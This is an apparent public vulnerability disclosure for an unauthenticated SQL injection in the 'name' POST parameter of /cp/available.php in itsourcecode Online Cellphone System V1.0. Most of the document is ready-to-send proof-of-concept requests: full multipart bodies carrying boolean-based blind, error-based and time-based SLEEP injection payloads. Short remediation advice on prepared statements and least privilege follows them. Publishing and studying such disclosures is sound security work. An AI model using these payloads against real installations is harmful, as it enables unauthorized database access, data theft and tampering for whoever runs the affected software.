itsourcecode Online Cellphone System V1.0 /cp/available.php SQL Injection Vulnerability

# itsourcecode Online Cellphone System V1.0 "/cp/available.php" SQL Injection Vulnerability ## Vulnerability Overview - **Vulnerability Type**: SQL Injection - **Affected File**: `/cp/available.php` - **Vulnerable Parameter**: `name` (multipart/form-data POST parameter) - **Version**: V1.0 - **Exploitation Conditions**: No login or authorization required ## Impact Scope - **Product**: Online Cellphone System - **Vendor**: itsourcecode - **Risk**: Attackers can exploit this vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, complete system control, and service disruption ## POC Code ### Boolean-based Blind ``` Parameter: MULTIPART name ((custom) POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="name" 123' RLIKE (SELECT (CASE WHEN (7589=7589) THEN 123 ELSE 0x28 END))-- Lova ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="foodid" 4 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="address" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="contact" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="city" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="type" Deliver ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="datep" ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="savechanges" ------WebKitFormBoundaryuAHfNzJmW7bgnPMB-- ``` ### Error-based ``` Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="name" 123' OR (SELECT 7145 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(7145=7145,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NQjr ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="foodid" 4 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="address" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="contact" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="city" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="type" Deliver ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="datep" ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="savechanges" ------WebKitFormBoundaryuAHfNzJmW7bgnPMB-- ``` ### Time-based Blind ``` Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="name" 123' AND (SELECT 2159 FROM (SELECT(SLEEP(5)))mIvV)-- NQjr ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="foodid" 4 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="address" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="contact" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="city" 123 ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="type" Deliver ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="datep" ------WebKitFormBoundaryuAHfNzJmW7bgnPMB Content-Disposition: form-data; name="savechanges" ------WebKitFormBoundaryuAHfNzJmW7bgnPMB-- ``` ## Remediation Solutions 1. **Use Prepared Statements and Parameter Binding**: Separate SQL code from user input data; user input values are treated as pure data and will not be interpreted as SQL code 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to expected formats 3. **Minimize Database User Privileges**: Ensure that database connection accounts have only the necessary minimum privileges; avoid using high-privilege accounts such as root or admin for routine operations 4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and remediate potential security vulnerabilities

Goal Reached Thanks to every supporter — we hit 100%!

itsourcecode Online Cellphone System V1.0 /cp/available.php SQL Injection Vulnerability

More from this source